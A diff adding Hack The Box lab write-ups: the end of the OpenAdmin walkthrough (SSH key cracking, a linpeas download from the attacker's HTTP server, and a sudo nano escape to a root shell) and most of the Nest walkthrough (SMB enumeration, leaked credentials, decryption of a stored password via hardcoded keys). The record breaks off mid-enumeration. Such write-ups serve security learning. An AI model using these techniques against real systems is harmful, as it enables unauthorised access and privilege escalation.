+ 1g 0:00:00:02 DONE (2021-05-27 10:16) 0.3496g/s 5014Kp/s 5014Kc/s 5014KC/sa6_123..*7¡Vamos!
+ Session completed
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → chmod 600 id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → ssh joanna@10.10.10.171 -i id_rsa
+ Enter passphrase for key 'id_rsa':
+ Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Thu May 27 08:24:40 UTC 2021
+
+ System load: 0.0 Processes: 123
+ Usage of /: 49.6% of 7.81GB Users logged in: 1
+ Memory usage: 29% IP address for ens160: 10.10.10.171
+ Swap usage: 0%
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+
+ 41 packages can be updated.
+ 12 updates are security updates.
+
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+
+ Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3
+ joanna@openadmin:~$ id
+ uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
+ joanna@openadmin:~$ ls
+ user.txt
+ joanna@openadmin:~$ cat user.txt
+ c9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user, we run linpeas again:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin]
+ → ls -lash linpeas.sh
+ 336K -rwxr-xr-x 1 nothing nothing 334K May 27 08:13 linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin]
+ → python3 -m http.server 9090
+
+ joanna@openadmin:~$ wget http://10.10.14.13:9090/linpeas.sh
+ --2021-05-27 08:26:50-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[====================================================================================================================================================>] 333.85K 696KB/s in 0.5s
+
+ 2021-05-27 08:26:50 (696 KB/s) - ‘linpeas.sh’ saved [341863/341863]
+
+ joanna@openadmin:~$ chmod +x linpeas.sh
+ joanna@openadmin:~$ ./linpeas.sh
+
+
+
+` 
+
+And here we see that joanna can run nano as the root user:
+
+
+ joanna@openadmin:~$ sudo -l
+ Matching Defaults entries for joanna on openadmin:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User joanna may run the following commands on openadmin:
+ (ALL) NOPASSWD: /bin/nano /opt/priv
+
+
+
+Nano allows inserting external files into the current one using the shortcut CTRL+R, so let's do it:
+
+
+ joanna@openadmin:~$ sudo -u root /bin/nano /opt/priv
+ ^R
+
+
+` 
+
+Here we see that we can execute a command using CTRL+X, so we're going to get a shell using the following:
+
+
+
+The shell gets a bit weird once you do it but it effectively spawns a root shell as intended:
+
+
+
+
+ Command to execute: reset; sh 1>&0 2>&0# id
+ uid=0(root) gid=0(root) groups=0(root) ^X Read File
+ # cat /root/root.txt M-F New Buffer
+ 2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/42.md b/Easy/42.md
new file mode 100644
index 0000000..b1e5b47
--- /dev/null
+++ b/Easy/42.md
@@ -0,0 +1,886 @@
+# Nest Writeup
+
+
+
+## Introduction :
+
+Nest is an easy windows box released back in january 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → sudo nmap -vvv -p- 10.10.10.178 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ [sudo] password for nothing:
+ Discovered open port 445/tcp on 10.10.10.178
+ Discovered open port 4386/tcp on 10.10.10.178
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → nmap -sCV -p445,4386 10.10.10.178 -Pn
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 08:30 CEST
+ Nmap scan report for 10.10.10.178
+ Host is up (0.032s latency).
+
+ PORT STATE SERVICE VERSION
+ 445/tcp open microsoft-ds?
+ 4386/tcp open unknown
+ | fingerprint-strings:
+ | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
+ | Reporting Service V1.2
+ | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
+ | Reporting Service V1.2
+ | Unrecognised command
+ | Help:
+ | Reporting Service V1.2
+ | This service allows users to run queries against databases using the legacy HQK format
+ | AVAILABLE COMMANDS ---
+ | LIST
+ | SETDIR <****Directory_Name>
+ | RUNQUERY <****Query_ID>
+ | DEBUG <****Password>
+ |_ HELP <****Command>
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port4386-TCP:V=7.91%I=7%D=5/28%Time=60B08DFE%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
+ SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
+ SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
+ SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
+ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
+ SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
+ SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
+ SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
+ SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
+ SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
+ SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
+ SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
+ SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
+ SF:\r\n\r\nLIST\r\nSETDIR\x20 <****Directory_Name>\r\nRUNQUERY\x20 <****Query_ID>\r\
+ SF:nDEBUG\x20 <****Password>\r\nHELP\x20 \r\n>")%r(SSLSessionReq,21,"\r
+ SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki
+ SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR
+ SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2
+ SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,
+ SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\
+ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A
+ SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20
+ SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
+ SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
+ SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
+ SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
+ SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R
+ SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2
+ SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>");
+
+ Host script results:
+ |_clock-skew: 7m38s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2021-05-28T06:40:33
+ |_ start_date: 2021-05-28T06:32:49
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 198.72 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 445 so let's investigate it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → smbclient -L \\\\10.10.10.178
+ Enter WORKGROUP\nothing's password:
+
+ Sharename Type Comment
+ --------- ---- -------
+ ADMIN$ Disk Remote Admin
+ C$ Disk Default share
+ Data Disk
+ IPC$ IPC Remote IPC
+ Secure$ Disk
+ Users Disk
+ SMB1 disabled -- no workgroup available
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → smbmap -H 10.10.10.178 -u anonymous -r --depth 5
+ [+] Guest session IP: 10.10.10.178:445 Name: 10.10.10.178
+ Disk Permissions Comment
+ ---- ----------- -------
+ ADMIN$ NO ACCESS Remote Admin
+ C$ NO ACCESS Default share
+ Data READ ONLY
+ .\Data\*
+ dr--r--r-- 0 Thu Aug 8 00:53:46 2019 .
+ dr--r--r-- 0 Thu Aug 8 00:53:46 2019 ..
+ dr--r--r-- 0 Thu Aug 8 00:58:07 2019 IT
+ dr--r--r-- 0 Mon Aug 5 23:53:41 2019 Production
+ dr--r--r-- 0 Mon Aug 5 23:53:50 2019 Reports
+ dr--r--r-- 0 Wed Aug 7 21:07:51 2019 Shared
+ IPC$ NO ACCESS Remote IPC
+ Secure$ NO ACCESS
+ Users READ ONLY
+ .\Users\*
+ dr--r--r-- 0 Sun Jan 26 00:04:21 2020 .
+ dr--r--r-- 0 Sun Jan 26 00:04:21 2020 ..
+ dr--r--r-- 0 Fri Aug 9 17:08:23 2019 Administrator
+ dr--r--r-- 0 Sun Jan 26 08:21:44 2020 C.Smith
+ dr--r--r-- 0 Thu Aug 8 19:03:29 2019 L.Frost
+ dr--r--r-- 0 Thu Aug 8 19:02:56 2019 R.Thompson
+ dr--r--r-- 0 Thu Aug 8 00:56:02 2019 TempUser
+
+
+Here it looks like the Data sgare seems to be accessible anonymously. So we can recursively list the contents of that share using smbclient:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → smbclient \\\\10.10.10.178\\Data
+ Enter WORKGROUP\nothing's password:
+ Try "help" to get a list of possible commands.
+ smb: \> recurse on
+ smb: \> ls
+ . D 0 Thu Aug 8 00:53:46 2019
+ .. D 0 Thu Aug 8 00:53:46 2019
+ IT D 0 Thu Aug 8 00:58:07 2019
+ Production D 0 Mon Aug 5 23:53:38 2019
+ Reports D 0 Mon Aug 5 23:53:44 2019
+ Shared D 0 Wed Aug 7 21:07:51 2019
+
+ \IT
+ NT_STATUS_ACCESS_DENIED listing \IT\*
+
+ \Production
+ NT_STATUS_ACCESS_DENIED listing \Production\*
+
+ \Reports
+ NT_STATUS_ACCESS_DENIED listing \Reports\*
+
+ \Shared
+ . D 0 Wed Aug 7 21:07:51 2019
+ .. D 0 Wed Aug 7 21:07:51 2019
+ Maintenance D 0 Wed Aug 7 21:07:32 2019
+ Templates D 0 Wed Aug 7 21:08:07 2019
+
+ \Shared\Maintenance
+ . D 0 Wed Aug 7 21:07:32 2019
+ .. D 0 Wed Aug 7 21:07:32 2019
+ Maintenance Alerts.txt A 48 Tue Aug 6 01:01:44 2019
+
+ \Shared\Templates
+ . D 0 Wed Aug 7 21:08:07 2019
+ .. D 0 Wed Aug 7 21:08:07 2019
+ HR D 0 Wed Aug 7 21:08:01 2019
+ Marketing D 0 Wed Aug 7 21:08:06 2019
+
+ \Shared\Templates\HR
+ . D 0 Wed Aug 7 21:08:01 2019
+ .. D 0 Wed Aug 7 21:08:01 2019
+ Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
+
+ \Shared\Templates\Marketing
+ . D 0 Wed Aug 7 21:08:06 2019
+ .. D 0 Wed Aug 7 21:08:06 2019
+
+ smb: \> cd \Shared\Templates\HR
+ smb: \Shared\Templates\HR\> ls
+ . D 0 Wed Aug 7 21:08:01 2019
+ .. D 0 Wed Aug 7 21:08:01 2019
+ Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
+
+ 10485247 blocks of size 4096. 6543390 blocks available
+
+ smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
+ Get file Welcome Email.txt? y
+ getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → cat Welcome\ Email.txt
+ We would like to extend a warm welcome to our newest member of staff,
+
+ You will find your home folder in the following location:
+ \\HTB-NEST\Users\
+
+ If you have any issues accessing specific services or workstations, please inform the
+ IT department and use the credentials below until all systems have been set up for you.
+
+ Username: TempUser
+ Password: welcome2019
+
+
+ Thank you
+ HR
+
+
+Here we get credentials: **TempUser:welcome2019** So let's run smbmap once again to enumerate the shares:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → smbmap -u Tempuser -p welcome2019 -H 10.10.10.178
+ [+] IP: 10.10.10.178:445 Name: 10.10.10.178
+ Disk Permissions Comment
+ ---- ----------- -------
+ ADMIN$ NO ACCESS Remote Admin
+ C$ NO ACCESS Default share
+ Data READ ONLY
+ IPC$ NO ACCESS Remote IPC
+ Secure$ READ ONLY
+ Users READ ONLY
+
+
+Now as we explore the shares with the tempuser we can access xml files for example:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → smbmap -u Tempuser -p welcome2019 -H 10.10.10.178 -R 'Data' -A xml
+ [+] IP: 10.10.10.178:445 Name: 10.10.10.178
+ [+] Starting search for files matching 'xml' on share Data.
+ [+] Match found! Downloading: Data\IT\Configs\Adobe\editing.xml
+ [+] Match found! Downloading: Data\IT\Configs\Adobe\projects.xml
+ [+] Match found! Downloading: Data\IT\Configs\Adobe\settings.xml
+ [+] Match found! Downloading: Data\IT\Configs\Atlas\Temp.XML
+ [+] Match found! Downloading: Data\IT\Configs\Microsoft\Options.xml
+ [+] Match found! Downloading: Data\IT\Configs\NotepadPlusPlus\config.xml
+ [+] Match found! Downloading: Data\IT\Configs\NotepadPlusPlus\shortcuts.xml
+ [+] Match found! Downloading: Data\IT\Configs\RU Scanner\RU_config.xml
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → ls -lash
+ total 52K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K May 28 09:29 .
+ 4.0K drwxr-xr-x 7 nothing nothing 4.0K May 28 09:02 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 246 May 28 09:29 10.10.10.178-Data_IT_Configs_Adobe_editing.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 258 May 28 09:29 10.10.10.178-Data_IT_Configs_Adobe_projects.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 1.3K May 28 09:29 10.10.10.178-Data_IT_Configs_Adobe_settings.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 1.4K May 28 09:29 10.10.10.178-Data_IT_Configs_Atlas_Temp.XML
+ 8.0K -rw-r--r-- 1 nothing nothing 4.5K May 28 09:29 10.10.10.178-Data_IT_Configs_Microsoft_Options.xml
+ 8.0K -rw-r--r-- 1 nothing nothing 6.3K May 28 09:29 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_config.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 2.1K May 28 09:29 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_shortcuts.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 270 May 28 09:29 '10.10.10.178-Data_IT_Configs_RU Scanner_RU_config.xml'
+ 4.0K -rw-r--r-- 1 nothing nothing 425 May 28 09:02 'Welcome Email.txt'
+
+
+
+Let's check if there is any sensitive information in the xml files we collected:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → vim 10.10.10.178-Data_IT_Configs_Adobe_settings.xml
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → grep -i password *.xml
+ 10.10.10.178-Data_IT_Configs_RU Scanner_RU_config.xml: fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → cat 10.10.10.178-Data_IT_Configs_RU\ Scanner_RU_config.xml
+ <****?xml version="1.0"?> <****ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <****Port>389 <****/Port> <****Username>c.smith <****/Username> <****Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= <****/Password> <****/ConfigFile>%
+
+So here it looks like that the password for the user **c.smith** is encrypted. Now what we should look for is the Secure share in the xml files, and we stumble upon the **NotePadPlusPlus** config file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → grep -i 'Secure\$' *.xml
+ 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_config.xml: <****File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
+
+Now we're hinted towards a Temp.txt file, so let's get it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → smbmap -u Tempuser -p welcome2019 -H 10.10.10.178 -R 'Secure$\IT\Carl'
+ [+] IP: 10.10.10.178:445 Name: 10.10.10.178
+ Disk Permissions Comment
+ ---- ----------- -------
+ Secure$ READ ONLY
+ .\Secure$IT\Carl\*
+ dr--r--r-- 0 Wed Aug 7 21:42:14 2019 .
+ dr--r--r-- 0 Wed Aug 7 21:42:14 2019 ..
+ dr--r--r-- 0 Wed Aug 7 21:44:00 2019 Docs
+ dr--r--r-- 0 Tue Aug 6 15:45:47 2019 Reports
+ dr--r--r-- 0 Tue Aug 6 16:41:55 2019 VB Projects
+ .\Secure$IT\Carl\Docs\*
+ dr--r--r-- 0 Wed Aug 7 21:44:00 2019 .
+ dr--r--r-- 0 Wed Aug 7 21:44:00 2019 ..
+ fr--r--r-- 56 Wed Aug 7 21:44:16 2019 ip.txt
+ fr--r--r-- 73 Wed Aug 7 21:43:46 2019 mmc.txt
+ .\Secure$IT\Carl\VB Projects\*
+ dr--r--r-- 0 Tue Aug 6 16:41:55 2019 .
+ dr--r--r-- 0 Tue Aug 6 16:41:55 2019 ..
+ dr--r--r-- 0 Tue Aug 6 16:41:53 2019 Production
+ dr--r--r-- 0 Tue Aug 6 16:47:41 2019 WIP
+ .\Secure$IT\Carl\VB Projects\WIP\*
+ dr--r--r-- 0 Tue Aug 6 16:47:41 2019 .
+ dr--r--r-- 0 Tue Aug 6 16:47:41 2019 ..
+ dr--r--r-- 0 Fri Aug 9 17:36:45 2019 RU
+ .\Secure$IT\Carl\VB Projects\WIP\RU\*
+ dr--r--r-- 0 Fri Aug 9 17:36:45 2019 .
+ dr--r--r-- 0 Fri Aug 9 17:36:45 2019 ..
+ dr--r--r-- 0 Thu Aug 8 00:05:54 2019 RUScanner
+ fr--r--r-- 871 Fri Aug 9 17:36:35 2019 RUScanner.sln
+ .\Secure$IT\Carl\VB Projects\WIP\RU\RUScanner\*
+ dr--r--r-- 0 Thu Aug 8 00:05:54 2019 .
+ dr--r--r-- 0 Thu Aug 8 00:05:54 2019 ..
+ dr--r--r-- 0 Wed Aug 7 22:00:11 2019 bin
+ fr--r--r-- 772 Thu Aug 8 00:05:09 2019 ConfigFile.vb
+ fr--r--r-- 279 Thu Aug 8 00:05:44 2019 Module1.vb
+ dr--r--r-- 0 Wed Aug 7 22:00:11 2019 My Project
+ dr--r--r-- 0 Wed Aug 7 22:00:11 2019 obj
+ fr--r--r-- 4828 Fri Aug 9 17:38:30 2019 RU Scanner.vbproj
+ fr--r--r-- 143 Wed Aug 7 22:00:28 2019 RU Scanner.vbproj.user
+ fr--r--r-- 133 Thu Aug 8 00:05:58 2019 SsoIntegration.vb
+ fr--r--r-- 4888 Thu Aug 8 00:06:03 2019 Utils.vb
+
+
+And we were able to list the contents, the folder contains a Visual Basic project called RUScanner. so let's mount the share locally to examine the files:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → sudo mkdir /mnt/Data
+ [sudo] password for nothing:
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → sudo mount -t cifs -o ro,username=TempUser,password=welcome2019 '//10.10.10.178/Secure$' /mnt/Data/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → ls /mnt/Data
+ Finance HR IT
+
+ ┌──(root💀nowhere)-[/mnt/Data/IT]
+ └─# cd /mnt/Data/IT/Carl/VB\ Projects/WIP/RU/RUScanner 130 ⨯
+
+ ┌──(root💀nowhere)-[/mnt/…/VB Projects/WIP/RU/RUScanner]
+ └─# ls -lash
+ total 33K
+ 4.0K drwxr-xr-x 2 root root 4.0K Aug 8 2019 .
+ 4.0K drwxr-xr-x 2 root root 4.0K Aug 9 2019 ..
+ 0 drwxr-xr-x 2 root root 0 Aug 7 2019 bin
+ 4.0K -rwxr-xr-x 1 root root 772 Aug 8 2019 ConfigFile.vb
+ 512 -rwxr-xr-x 1 root root 279 Aug 8 2019 Module1.vb
+ 0 drwxr-xr-x 2 root root 0 Aug 7 2019 'My Project'
+ 0 drwxr-xr-x 2 root root 0 Aug 7 2019 obj
+ 8.0K -rwxr-xr-x 1 root root 4.8K Aug 9 2019 'RU Scanner.vbproj'
+ 512 -rwxr-xr-x 1 root root 143 Aug 6 2019 'RU Scanner.vbproj.user'
+ 4.0K -rwxr-xr-x 1 root root 133 Aug 8 2019 SsoIntegration.vb
+ 8.0K -rwxr-xr-x 1 root root 4.8K Aug 7 2019 Utils.vb
+
+
+And here the important file is Utils.vb:
+
+
+ Imports System.Text
+ Imports System.Security.Cryptography
+ Public Class Utils
+
+ Public Shared Function GetLogFilePath() As String
+ Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
+ End Function
+
+
+
+
+ Public Shared Function DecryptString(EncryptedString As String) As String
+ If String.IsNullOrEmpty(EncryptedString) Then
+ Return String.Empty
+ Else
+ Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
+ End If
+ End Function
+
+ Public Shared Function EncryptString(PlainString As String) As String
+ If String.IsNullOrEmpty(PlainString) Then
+ Return String.Empty
+ Else
+ Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
+ End If
+ End Function
+
+ Public Shared Function Encrypt(ByVal plainText As String, _
+ ByVal passPhrase As String, _
+ ByVal saltValue As String, _
+ ByVal passwordIterations As Integer, _
+ ByVal initVector As String, _
+ ByVal keySize As Integer) _
+ As String
+
+ Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
+ Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
+ Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
+ Dim password As New Rfc2898DeriveBytes(passPhrase, _
+ saltValueBytes, _
+ passwordIterations)
+
+
+Basically here, we see that the class contains methods to encrypt and decrypt passwords. We can use the decryptString() function to decrypt the password gained earlier. As the code uses .NET classes, it can be rewritten in any .NET based language, therefore it can be ported to C#, and compiled on linux thanks to [mono](https://www.mono-project.com/download/stable/#download-lin-ubuntu), so let's install it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → apt search mono-devel
+ Sorting... Done
+ Full Text Search... Done
+ mono-devel/kali-rolling 6.8.0.105+dfsg-3 all
+ Mono development tools
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → apt install mono-devel
+
+
+
+Now that we know the sourcecode, let's write the decrypt() function in C#, to which we will pass the encrypted password we found earlier:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → vim decrypt.cs
+
+
+
+
+
+ using System;
+ using System.IO;
+ using System.Text;
+ using System.Security.Cryptography;
+ namespace Dec {
+ class Decryptor{
+ public static void Main(){
+ var pt = Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22","88552299", 2, "464R5DFA5DL6LE28", 256);
+ Console.WriteLine("PlainText: " + pt);
+ }
+ public static String Decrypt(String cipherText, String passPhrase, String saltValue, int passwordIterations, String initVector, int keySize ) {
+ var initVectorBytes=Encoding.ASCII.GetBytes(initVector);
+ var saltValueBytes=Encoding.ASCII.GetBytes(saltValue);
+ var cipherTextBytes=Convert.FromBase64String(cipherText);
+ var password=newRfc2898DeriveBytes(passPhrase, saltValueBytes,passwordIterations);
+ var keyBytes=password.GetBytes(keySize/8);
+ var symmetricKey=newAesCryptoServiceProvider();
+ symmetricKey.Mode=CipherMode.CBC;
+ var decryptor=symmetricKey.CreateDecryptor(keyBytes, initVectorBytes);
+ var memoryStream=newMemoryStream(cipherTextBytes);
+ var cryptoStream=newCryptoStream(memoryStream, decryptor,CryptoStreamMode.Read);
+ var plainTextBytes=newbyte[cipherTextBytes.Length];
+ var decryptedByteCount=cryptoStream.Read(plainTextBytes, 0,plainTextBytes.Length);
+ memoryStream.Close();
+ cryptoStream.Close();
+ varplainText=Encoding.ASCII.GetString(plainTextBytes, 0,decryptedByteCount);
+ returnplainText;
+ }
+
+ }
+ }
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → mcs decrypt.cs
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → ./decrypt.exe
+ Plaintext: xRxRxPANCAK3SxRxRx
+
+
+And we decrypted **c.smith** 's password ! **xRxRxPANCAK3SxRxRx**
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → sudo umount /mnt/Data
+ [sudo] password for nothing:
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → smbclient -U c.smith //10.10.10.178/Users
+ Enter WORKGROUP\c.smith's password: xRxRxPANCAK3SxRxRx
+ Try "help" to get a list of possible commands.
+ smb: \> cd c.smith
+ smb: \c.smith\> ls
+ . D 0 Sun Jan 26 08:21:44 2020
+ .. D 0 Sun Jan 26 08:21:44 2020
+ HQK Reporting D 0 Fri Aug 9 01:06:17 2019
+ user.txt A 32 Fri Aug 9 01:05:24 2019
+
+ smb: \c.smith\> get user.txt
+ getting file \c.smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
+
+ smb: \c.smith\>
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → cat user.txt
+ cfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we managed to get the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc, we need to take a look at the HQK Reporting folder:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → smbclient -U c.smith //10.10.10.178/Users
+ Enter WORKGROUP\c.smith's password:
+ Try "help" to get a list of possible commands.
+
+ smb: \> ls
+ . D 0 Sun Jan 26 00:04:21 2020
+ .. D 0 Sun Jan 26 00:04:21 2020
+ Administrator D 0 Fri Aug 9 17:08:23 2019
+ C.Smith D 0 Sun Jan 26 08:21:44 2020
+ L.Frost D 0 Thu Aug 8 19:03:01 2019
+ R.Thompson D 0 Thu Aug 8 19:02:50 2019
+ TempUser D 0 Thu Aug 8 00:55:56 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \> cd c.smith
+
+ smb: \c.smith\> ls
+ . D 0 Sun Jan 26 08:21:44 2020
+ .. D 0 Sun Jan 26 08:21:44 2020
+ HQK Reporting D 0 Fri Aug 9 01:06:17 2019
+ user.txt A 32 Fri Aug 9 01:05:24 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \c.smith\> cd "HQK Reporting"
+
+ smb: \c.smith\HQK Reporting\> ls
+ . D 0 Fri Aug 9 01:06:17 2019
+ .. D 0 Fri Aug 9 01:06:17 2019
